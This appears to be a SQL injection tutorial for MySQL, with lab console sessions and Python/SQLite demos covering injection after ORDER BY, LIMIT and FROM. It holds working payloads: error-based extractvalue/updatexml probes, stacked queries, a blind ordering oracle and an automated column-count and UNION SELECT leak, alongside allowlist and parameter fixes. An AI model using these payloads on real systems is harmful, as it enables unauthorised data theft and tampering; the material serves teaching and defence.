Notes on MySQL injection points

Injection after ORDER BY

When the injection point sits after ORDER BY, a UNION SELECT cannot be appended there (MySQL rejects it with "Incorrect usage of UNION and ORDER BY"), so error-based injection is used instead.

The value after ORDER BY cannot be parameterized. This is not specific to ORDER BY: any position that takes a string but cannot be quoted cannot be bound as a parameter, including SQL keywords, database names, table names, column names and function names. A bound parameter arrives as a quoted string literal, so order by 'user_id' merely sorts by a constant, and a quoted keyword such as order by user_id 'desc' is a syntax error.

Because ORDER BY cannot be parameterized, request parameters such as orderby or sort deserve attention when testing.

If appending desc or asc (descending or ascending) to the parameter changes the order of the displayed results, the input reaches the ORDER BY clause and is injectable:

mysql> select * from users order by 1 desc;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)

mysql> select * from users order by 1 asc;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
Error-based payloads in the ORDER BY position; the server version and the current user come back inside the XPath error message:

mysql> select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':8.0.12'

mysql> select * from users order by 1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'


sqli-labs Less-46 contains an ORDER BY injection; try it yourself if you are interested.
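As an added example (not code from the original post), the same ORDER BY situation reproduced in Python against an in-memory SQLite copy of the users table: the asc/desc probe, why binding the sort column as a parameter achieves nothing, a boolean oracle that works once the position is confirmed (the extractvalue()/updatexml() payloads above are MySQL-only, so SQLite needs an ordering-based oracle instead), and an allowlist-based fix. The table contents, the allowlist and the function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data shaped like the DVWA `users` table in the text
# (illustrative values, not taken from a live system).
ROWS = [
    (1, "admin",  "admin", "admin",   "5f4dcc3b5aa765d61d8327deb882cf99", "/hackable/users/admin.jpg",   "2019-10-06 14:59:01", 8),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03", "/hackable/users/gordonb.jpg", "2019-09-12 11:23:53", 0),
    (3, "Hack",   "Me",    "1337",    "8d3533d75ae2c3966d7e0d4fcc69216b", "/hackable/users/1337.jpg",    "2019-09-12 11:23:53", 0),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "user TEXT, password TEXT, avatar TEXT, last_login TEXT, failed_login INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?,?,?,?)", ROWS)
    return conn

def vulnerable_list(conn, sort):
    """The vulnerable pattern: a `sort` request parameter concatenated into
    ORDER BY, because a bound parameter there would only be a constant."""
    return conn.execute(f"SELECT user_id, user FROM users ORDER BY {sort}").fetchall()

def bound_param_sorts_nothing(conn):
    """Why ORDER BY is not parameterized: binding the column name turns it into
    a string literal, so rows come back in table order instead of by user_id
    DESC. A MySQL prepared statement behaves the same way."""
    bound = conn.execute("SELECT user_id FROM users ORDER BY ? DESC", ("user_id",)).fetchall()
    real = conn.execute("SELECT user_id FROM users ORDER BY user_id DESC").fetchall()
    return bound != real

def asc_desc_probe(conn, param):
    """The detection step from the text: appending ' asc' and ' desc' to the
    parameter and getting different orders shows the input reaches ORDER BY."""
    return vulnerable_list(conn, f"{param} asc") != vulnerable_list(conn, f"{param} desc")

def blind_oracle(conn, condition):
    """Once confirmed, the sort key itself is an oracle: the CASE sorts by
    user_id when `condition` holds and by -user_id otherwise, so the first row
    reveals the truth value without any error message."""
    rows = vulnerable_list(conn, f"(CASE WHEN ({condition}) THEN user_id ELSE -user_id END)")
    return rows[0][0] == 1

ALLOWED_SORT = {"user_id", "user", "last_login"}   # hypothetical allowlist for this app

def safe_list(conn, column, direction="asc"):
    """Hardened version: identifiers and keywords cannot be bound, so they are
    mapped through an allowlist and only allowlisted strings reach the SQL."""
    if column not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {column!r}")
    direction = "DESC" if direction.lower() == "desc" else "ASC"
    return conn.execute(f"SELECT user_id, user FROM users ORDER BY {column} {direction}").fetchall()

def rejects(conn, sort):
    """True if the hardened function refuses the given sort value."""
    try:
        safe_list(conn, sort)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("asc/desc probe:", asc_desc_probe(db, "user_id"))
    print("bound parameter useless:", bound_param_sorts_nothing(db))
    print("oracle, true condition :", blind_oracle(db, "(SELECT COUNT(*) FROM users) = 3"))
    print("oracle, false condition:", blind_oracle(db, "(SELECT COUNT(*) FROM users) = 4"))
    print("hardened rejects payload:", rejects(db, "1 and updatexml(1,concat(0x7e,user()),1)"))
```

The allowlist is the only robust fix for this position: escaping does not help because the injected text is never inside quotes, and a bound parameter is silently treated as a constant rather than as the column the caller meant.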


Injection after LIMIT

The PROCEDURE ANALYSE method only applies to MySQL versions 5.0.0 < MySQL < 5.6.6. It is used because PROCEDURE is one of the few clauses MySQL's grammar accepts after LIMIT (neither UNION nor ORDER BY can follow it).

Use PROCEDURE ANALYSE together with error-based injection:

select * from users limit 0,2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Stacked queries also work here, provided the application's database driver executes several statements in one call:

mysql> select * from users limit 0,2;show databases;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
2 rows in set (0.00 sec)

+--------------------+
| Database           |
+--------------------+
| bwapp              |
| challenges         |
| dvwa               |
| information_schema |
| mysql              |
| performance_schema |
| pikachu            |
| pkxss              |
| root               |
| security           |
| sys                |
+--------------------+
14 rows in set (0.00 sec)
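Added example, not from the original post: the stacked-query variant of the LIMIT injection in Python, with SQLite standing in for MySQL. It shows that the stacked part depends on the API executing several statements per call (sqlite3's executescript() plays the role of a MySQL connector with multi-statements enabled), that a single-statement execute() rejects it, and that, unlike ORDER BY, a LIMIT value can simply be bound as a parameter. The table, the attacker payload and the function names are assumptions for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample table (not from a live system)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, failed_login INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "admin", 8), (2, "gordonb", 0), (3, "1337", 0)])
    return conn

# Constructed attacker value for the `limit` parameter: a second statement
# that resets the admin lockout counter rides along behind the SELECT.
STACKED = "2; UPDATE users SET failed_login = 0 WHERE user = 'admin'"

def multi_statement_page(conn, limit):
    """Vulnerable shape of `select * from users limit 0,2;show databases;`:
    `limit` is concatenated and the SQL is handed to an API that runs every
    statement in the string, so the UPDATE executes too."""
    conn.executescript(f"SELECT user_id, user FROM users LIMIT {limit};")
    return conn.execute("SELECT user_id, user FROM users").fetchall()

def single_statement_page(conn, limit):
    """Same concatenation through DB-API execute(), which refuses a second
    statement ("You can only execute one statement at a time"). The LIMIT is
    still injectable for other techniques, but stacking is off the table."""
    try:
        conn.execute(f"SELECT user_id, user FROM users LIMIT {limit}")
        return "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return "rejected"

def parameterized_page(conn, offset, count):
    """Unlike ORDER BY, LIMIT takes values, so it can be bound: both SQLite and
    MySQL prepared statements accept ? in LIMIT. int() rejects non-numbers early."""
    return conn.execute("SELECT user_id, user FROM users LIMIT ? OFFSET ?",
                        (int(count), int(offset))).fetchall()

def admin_failed_login(conn):
    return conn.execute("SELECT failed_login FROM users WHERE user = 'admin'").fetchone()[0]

def demo():
    """Returns (counter before, counter after multi-statement API,
    single-statement outcome, counter after single-statement API)."""
    db = make_db()
    before = admin_failed_login(db)
    multi_statement_page(db, STACKED)
    after_multi = admin_failed_login(db)
    db2 = make_db()
    outcome = single_statement_page(db2, STACKED)
    after_single = admin_failed_login(db2)
    return before, after_multi, outcome, after_single

def parameterized_rejects(count):
    """True if the parameterized page refuses the value as a row count."""
    try:
        parameterized_page(make_db(), 0, count)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(demo())                            # the UPDATE only lands via the multi-statement API
    print(parameterized_rejects(STACKED))    # bound LIMIT never sees the second statement
```

The take-away for testing is that the SQL alone does not decide whether stacked queries work; the same payload succeeds or fails depending on whether the application's driver permits multiple statements per call.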






Injection after FROM

First determine the number of columns with ORDER BY n: the query succeeds while n is at most the column count and fails with "Unknown column 'n' in 'order clause'" once it is larger (ORDER BY 8 succeeds below, so the table has 8 columns). Then inject a UNION SELECT with the same number of columns:

mysql> select * from users order by 8;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)

mysql> select * from users union select 1,2,3,4,user(),6,7,8;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |
|       1 | 2          | 3         | 4       | root@localhost                   | 6                           | 7                   |            8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
6 rows in set (0.00 sec)
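Added example (not the post's own code): the two steps of this section, counting columns with ORDER BY and then reading a value back through UNION SELECT, automated in Python against an in-memory SQLite table with the same eight columns. sqlite_version() stands in for MySQL's version()/user(); the table contents and the function names are constructed for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample table with the eight columns of the DVWA `users` table
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "user TEXT, password TEXT, avatar TEXT, last_login TEXT, failed_login INTEGER)")
    conn.execute("INSERT INTO users VALUES (1,'admin','admin','admin',"
                 "'5f4dcc3b5aa765d61d8327deb882cf99','/hackable/users/admin.jpg','2019-10-06 14:59:01',8)")
    return conn

def vulnerable_query(conn, tail):
    """Injection after FROM: everything after the table name is attacker input."""
    return conn.execute("SELECT * FROM users" + tail).fetchall()

def count_columns(run, max_cols=64):
    """Step 1: ORDER BY n is accepted while n <= column count and fails at n+1
    (MySQL: "Unknown column 'n' in 'order clause'"; SQLite: "ORDER BY term out
    of range"). Walk n upward; the first error gives the count."""
    for n in range(1, max_cols + 1):
        try:
            run(f" ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("more than max_cols columns")

def union_payload(ncols, expr, slot):
    """Step 2: a UNION SELECT with exactly ncols columns (a mismatch is itself
    an error), numbered so the echoing slot is obvious, with `expr` in the
    chosen slot (the text puts user() in slot 5, the `password` column)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return " UNION SELECT " + ", ".join(cols)

def leak_via_union(conn, expr, slot=5):
    """Full chain: find the column count, then read `expr` out of `slot`.
    The injected row is the one still carrying a marker number in an
    untouched slot, which distinguishes it from genuine table rows."""
    ncols = count_columns(lambda t: vulnerable_query(conn, t))
    rows = vulnerable_query(conn, union_payload(ncols, expr, slot))
    check = 2 if slot != 2 else 3
    injected = next(r for r in rows if r[check - 1] == check)
    return ncols, injected[slot - 1]

def demo():
    """Returns (column count found, value leaked via UNION, real value)."""
    db = make_db()
    ncols, leaked = leak_via_union(db, "sqlite_version()")
    return ncols, leaked, sqlite3.sqlite_version

if __name__ == "__main__":
    print(union_payload(8, "user()", 5))   # the payload used in the text
    print(demo())
```

The column-count loop is the part worth automating: on a real target each ORDER BY n is one request, and the first n that errors fixes both the UNION width and which slot to place the probe expression in.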